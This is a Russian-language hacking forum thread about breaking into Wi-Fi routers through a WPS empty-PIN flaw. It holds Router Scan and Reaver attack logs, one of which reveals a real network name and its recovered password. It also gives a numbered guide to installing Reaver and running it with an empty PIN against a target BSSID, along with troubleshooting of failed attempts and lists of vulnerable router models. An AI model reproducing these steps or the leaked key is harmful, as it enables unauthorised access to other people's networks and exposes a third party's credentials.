Уязвимость в протоколе Wi-Fi Protected Setup

Обсуждение в разделе «Беспроводные технологии/Wi-Fi/Wardriving», начал(-а) gpuhash, 30.12.2011.

  1. binarymaster

    binarymaster Elder - Старейшина

    Регистрация:
    11.12.2010
    Сообщения:
    3 351
    Одобрения:
    5 926
    Репутация:
    59
    С флагом -p "" (несколько страниц назад было).

    А ещё я тут внезапно нашёл Sercomm RV6688BCM, которые обычно поддаются Pixie Dust... но на этот раз попался с пустым пином! o_O

    Code:
    [*] Audit started.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [+] Associated successfully.
    [*] Trying pin "12345670"...
    [*] Sending EAPOL Start...
    [*] Received Identity Request.
    [*] Sending Identity Response...
    [*] Received WPS Message M1.
    [*] E-Nonce: 136F70913C5A8B74225978490E93239C
    [*] PKE: 0FB2D266E52270D3864CA09700FD11124283FCF835118C455512192D398729C2C7B9AAA3E49A87ADEDA99DB0872E6295CBC188AA18E7E54B83D75FB2632EF786D76E8296B13E9AAFD55ECBD521B08E394DD01B623B4A49F2F3D112EA0CE1611974C527B0EF25DC739D2500AEEAEA2E65DCA7E264D5CD231E20B4B495C003E8FBC3C440B2BB2BFDE8BBF34EE2970F60FDF425D4198C35417111A01DBDF04E2A465F1C80AB502B64D52A7714327B93F39DBC0173BE280B78EB593FA5F130B1CC8E
    [*] Manufacturer: SERCOMM
    [*] Model Name: RV6688BCM
    [*] Model Number: RV6688BCM
    [*] Serial Number: 53434F4D14104997
    [*] Device Name: RV6688BCM
    [*] Sending WPS Message M2...
    [*] R-Nonce: 4B82C0F1E6431FBD116BB37870AE2B4E
    [*] PKR: 971CB3AC567472A7C62FBAD38998FE84F769E4F18602D9BBFE0667C0FD4EDD88AECCF65C24CD0E1A8F5DF0B33068CD2D5258A12E92909F9008B45858BE716C924AC2ABF6C29BA8DEA801BD77BD8DA8A5EB9C7392B508C28C36CFDB43CC1469DFDFE3BB7DB29D5F5F8DA257FF6B802B66068D8242F9A3125AC64796141D0BC7EE3D9BCBF2FD3A7D1B19A53183B41E6654A6A1BA946D4D71E55D25A1E2925606FAE6BA5FA2828FD3B98BF39801F1E1844742F93C5068B9E9A40CF2444BB07E6DD4
    [*] AuthKey: CA808543C03093432C15F8AAF2C7D7414A63065E9D9C0E0216DBE88E008E54EF
    [*] Received WPS Message M3.
    [*] E-Hash1: E56F292D3C9BE82A8702EB2A1435F9CC404ABE8D7E7737D72946FB09D4FBAD75
    [*] E-Hash2: E56F292D3C9BE82A8702EB2A1435F9CC404ABE8D7E7737D72946FB09D4FBAD75
    [*] This AP is potentially vulnerable to the "empty string" pin.
    [*] To specify <empty> pin, add empty line to PINs list and disable checksum calculation.
    [*] Also in this case the pin can have two same halfs (e.g. 00000000).
    [*] Sending WPS Message M4...
    [*] Received WSC NACK.
    [-] Error: Wrong PIN code.
    [*] Sending WSC NACK...
    [-] Request timed out.
    [*] Sending WSC NACK...
    [-] Request timed out.
    [*] Sending WSC NACK...
    [-] Session timed out.
    [*] Starting Pixie Dust attack...
    [*] The AP /might be/ vulnerable.
    [*] Try again with --force or with another (newer) set of data.
    [*] Also ensure that the date time and time zone on your computer are set correctly.
    [*] Audit stopped.
    [*] Audit started.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [+] Associated successfully.
    [*] Trying pin ""...
    [*] Sending EAPOL Start...
    [*] Received Identity Request.
    [*] Sending Identity Response...
    [*] Received WPS Message M1.
    [*] E-Nonce: 53DDC768720082F141C35BF4051E4F48
    [*] PKE: 2DC9A4EE82191F650548A09FE72993E75FC33944454D54D36C1A94C413F9AE3698245EB9C0BD5758E97CD15DD7264B19E22E088D567077D8883835B1F206A29E26C123949F8E8F1ED719FF49C92B1A778EDB3AB32174862451C5A8A978552D907FFFF2E759B120B1067664101C482A7321C5EA020F8DBDAAB06AC4FA55EA96F5EFE3C919FD7198EE5AD9512C97B91930A36E0FEECF5390DB8ABFA62FE922D312887F0CACF2EFEB6B2B20F0E2D3E9CDE34F79B87F352932D8D69389B248475803
    [*] Manufacturer: SERCOMM
    [*] Model Name: RV6688BCM
    [*] Model Number: RV6688BCM
    [*] Serial Number: 53434F4D14104997
    [*] Device Name: RV6688BCM
    [*] Sending WPS Message M2...
    [*] R-Nonce: 0A5920DB91A74631739A26BE87711D96
    [*] PKR: 6A23E76D3D13B67BA56AEC2277580CE736567A0AD400EE03DED57CFD0454D6A1436F6309A2E33FF9404D376F10B65E5D01CC30E9DE9CB4DD1A625A11A59A2D7179D46DF1749A659799B5C23263D87225F9363C53F64C84750B34175AFC7AB2DBD3EB6092EE5C703F3245B5E2C2A071EF6D5439A5D8AB53D5F34608E2984FCA19829D9D1FBF2FA185A60F3173BF9111777054B7C9E616AB2061DE255F92550100A6B7F65F7623878384F0B2FDE8AE37D5D82D0FD59A3C3A1186CD2CA5DFE6DB03
    [*] AuthKey: 23DB14DBE508E911E4B185298C17B168EBB3AA7A6FB7369FCB7D2A9DE589CADC
    [*] Received WPS Message M3.
    [*] E-Hash1: 8799E7C5674192252389D749E42801B8C1BD47BE6904CE96274223FE05EE22A3
    [*] E-Hash2: 8799E7C5674192252389D749E42801B8C1BD47BE6904CE96274223FE05EE22A3
    [*] Sending WPS Message M4...
    [*] Received WPS Message M5.
    [+] First half found: <empty>
    [*] Sending WPS Message M6...
    [*] Received WPS Message M7.
    [*] Sending WSC NACK...
    [*] EAP session closed.
    [+] WPS PIN: <empty>
    [+] SSID: MGTS_GPON_4997
    [+] Key: XSA6P4XF
    [+] Key Index: 1
    [*] Audit stopped.
    

    RS оповещает о потенциальном пустом пине, да. :)
     
  2. fffsfs

    fffsfs Member

    Регистрация:
    17.01.2017
    Сообщения:
    278
    Одобрения:
    12
    Репутация:
    0
    Это все для кали(
     
  3. binarymaster

    binarymaster Elder - Старейшина

    Регистрация:
    11.12.2010
    Сообщения:
    3 351
    Одобрения:
    5 926
    Репутация:
    59
  4. fffsfs

    fffsfs Member

    Регистрация:
    17.01.2017
    Сообщения:
    278
    Одобрения:
    12
    Репутация:
    0
    Офигеть!!!!!До чего техника дошла.....
     
  5. binarymaster

    binarymaster Elder - Старейшина

    Регистрация:
    11.12.2010
    Сообщения:
    3 351
    Одобрения:
    5 926
    Репутация:
    59
    А то! :cool: И на десерт...

    Создал пулл реквест в репозиторий PixieWps - добавление поддержки пустого пина. :)
    https://github.com/wiire-a/pixiewps/pull/49
     
  6. mazik

    mazik Member

    Регистрация:
    5.01.2016
    Сообщения:
    64
    Одобрения:
    43
    Репутация:
    0
    Хорошая работа мистр БИ.. :);):rolleyes::cool:
    Уже не поддаются.Сменили прошивку.:eek::mad:o_O:mad:
     
  7. binarymaster

    binarymaster Elder - Старейшина

    Регистрация:
    11.12.2010
    Сообщения:
    3 351
    Одобрения:
    5 926
    Репутация:
    59
    Но не на всех. :)
     
    Это одобряет fffsfs.
  8. fffsfs

    fffsfs Member

    Регистрация:
    17.01.2017
    Сообщения:
    278
    Одобрения:
    12
    Репутация:
    0
    Тоесть сичас могу подклюца к тем MTSAa что там? А вот :MTS828FT-9FA4 вроде это название.Да? Через пиксю?
     
  9. fffsfs

    fffsfs Member

    Регистрация:
    17.01.2017
    Сообщения:
    278
    Одобрения:
    12
    Репутация:
    0
    А как ета добавить в писку? Не понимаю такои
     
  10. spassk14

    spassk14 New Member

    Регистрация:
    11.09.2017
    Сообщения:
    2
    Одобрения:
    3
    Репутация:
    0
    Пробовал с этим флагом -p "" взломать свой ростелекомовский роутер ZTE H118n (v2.3) не работает, не могли бы Вы написать гайд как его взламывали?

    +Я взламывал на Kali Linux, с новым Reaver t6x
     
  11. binarymaster

    binarymaster Elder - Старейшина

    Регистрация:
    11.12.2010
    Сообщения:
    3 351
    Одобрения:
    5 926
    Репутация:
    59
    Можете привести лог? Есть вероятность, что в reaver закрался баг.
    С помощью модифицированного Router Scan:
    https://forum.antichat.ru/posts/4122981

    Но он ещё публично не выпустился.
     
  12. fffsfs

    fffsfs Member

    Регистрация:
    17.01.2017
    Сообщения:
    278
    Одобрения:
    12
    Репутация:
    0
    08:86:3b:d8:2a:6d
    Два предложенных из роутер скан, даже не проверяет
     
  13. spassk14

    spassk14 New Member

    Регистрация:
    11.09.2017
    Сообщения:
    2
    Одобрения:
    3
    Репутация:
    0

    Сегодня попробовал, у меня все получилось)

    Гайд для владельцев ZTE H118N v2.3 (Ростелеком) (Взлом WPS):
    1.Загружаемся в Kali Linux( с флешки)
    2.Подключаемся к интернету (через Wi-Fi, или по кабелю)
    3.Запускаем терминал
    4.Устанавливаем libpcap-dev:
    А.sudo apt-get update (обновление репозитория Kali Linux)
    Б.sudo apt-get install libpcap-dev (Установка PCAP)
    5.Установка Reaver (t6x)
    А.git clone https://github.com/t6x/reaver-wps-fork-t6x
    Б.cd reaver-wps-fork-t6x*/
    cd src/
    ./configure
    make
    В.sudo make install
    5.Когда установили, перезапускаем Терминал
    6.Переводим Wi-Fi адаптер в режим монитора
    7.Вводим: airmon-ng kill (убиваем процессы при соединении по Wi-Fi)
    8.Ищем через wash -i wlan0mon (вместо wlan0mon вводите название Вашего адаптера в режиме монитора) точку, которую будете ломать
    9.Вводим команду (внимательно вводите, чтобы ошибок не было! P.S Вместо wlan0mon вводите ваш адаптер в режиме монитора, BSSID- MAC-Адрес роутера,которого взламываем)
    reaver -i wlan0mon -b bssid -vv -p "" -n
    10.Все, точка взломана)
     
    Это одобряют Anton_co, Alvinng и leonid2012lnv.
  14. leonid2012lnv

    leonid2012lnv New Member

    Регистрация:
    10.03.2017
    Сообщения:
    13
    Одобрения:
    3
    Репутация:
    0
    Спасибо,Мастер.Вот это мануальчик!
    Попробовал на ZXHN H108N но увы...
    Switching wlan1mon to channel 1
    [+] Waiting for beacon from 74:A7:8E:C1:******
    [+] Associated with 74:A7:8E:C1:****** (ESSID: RT-WiFi_****)
    [+] Trying pin "-n"
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [+] Received M1 message
    [+] Sending M2 message
    [+] Received M3 message
    [+] Sending M4 message
    [+] Received M5 message
    [+] Sending M6 message
    [!] WARNING: Receive timeout occurred
    [+] Sending WSC NACK
    [+] Quitting after 1 crack attempts
    [-] Failed to recover WPA key
    [*] String pin was specified, nothing to save.
    Может что не так делаю? Опыта и знаний явно не хватает.
     
  15. fgh_2007

    fgh_2007 Member

    Регистрация:
    28.10.2011
    Сообщения:
    70
    Одобрения:
    11
    Репутация:
    4
    ты подбираешь пин "-n"
    [+] Trying pin "-n"
     
    Это одобряет binarymaster.
  16. leonid2012lnv

    leonid2012lnv New Member

    Регистрация:
    10.03.2017
    Сообщения:
    13
    Одобрения:
    3
    Репутация:
    0
    А как должна выглядеть команда для пустого пина?
     
  17. CRACK211

    CRACK211 Member

    Регистрация:
    16.09.2009
    Сообщения:
    541
    Одобрения:
    467
    Репутация:
    4
    -p ""
     
    Это одобряет Kakoluk.
  18. muradddddd

    muradddddd Member

    Регистрация:
    19.05.2017
    Сообщения:
    108
    Одобрения:
    6
    Репутация:
    0
    А какие роутеры подаються
    к пустым пинам?
     
  19. binarymaster

    binarymaster Elder - Старейшина

    Регистрация:
    11.12.2010
    Сообщения:
    3 351
    Одобрения:
    5 926
    Репутация:
    59
    [​IMG]

    Информация уже собирается на 3WiFi.
    Две двойные кавычки после -p поставили? Если да, попробуйте убрать -n в конце.
     
    Это одобряют Kakoluk и Payer.
  20. maus

    maus Member

    Регистрация:
    30.05.2015
    Сообщения:
    195
    Одобрения:
    44
    Репутация:
    0
    CA:A3:66 - ZTE ZXHN H298N -p ""
     
    Это одобряет binarymaster.
Загрузка...
Похожие темы
  1. Ответы:
    35
    Просмотры:
    6 763
  2. Ответы:
    1
    Просмотры:
    1 508
  3. Ответы:
    1
    Просмотры:
    837
  4. Ответы:
    2
    Просмотры:
    488
  5. Ответы:
    17
    Просмотры:
    1 827
  6. Ответы:
    0
    Просмотры:
    650
  7. Ответы:
    2
    Просмотры:
    1 577